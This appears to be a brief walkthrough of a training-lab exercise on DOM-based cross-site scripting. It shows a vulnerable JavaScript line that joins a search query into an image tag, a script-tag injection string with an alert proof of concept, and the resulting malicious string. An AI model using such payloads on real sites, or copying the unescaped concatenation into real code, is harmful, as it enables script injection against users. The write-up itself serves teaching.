IML - Cross-Site Scripting: Ep.4 – DOM-Based XSS
Cross-Site Scripting Ep.4 – D - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.
IML - Cross-Site Scripting: Ep.4 – DOM-Based XSS
Original query:
1
2
var tracker = '<div hidden><img src="/resources/search_assets/search.gif?query=' + query + '"></div>'
Inject the following:
1
2
'"\>\<script\>alert('XSS')\</script\>\<"'
Malicious query:
1
2
var tracker = '<div hidden><img src="/resources/search_assets/search.gif?query=' + '"><script>alert('XSS')</script><"' + '"></div>'
Paste entire malicious code above into Search box
This post is licensed under CC BY 4.0 by the author.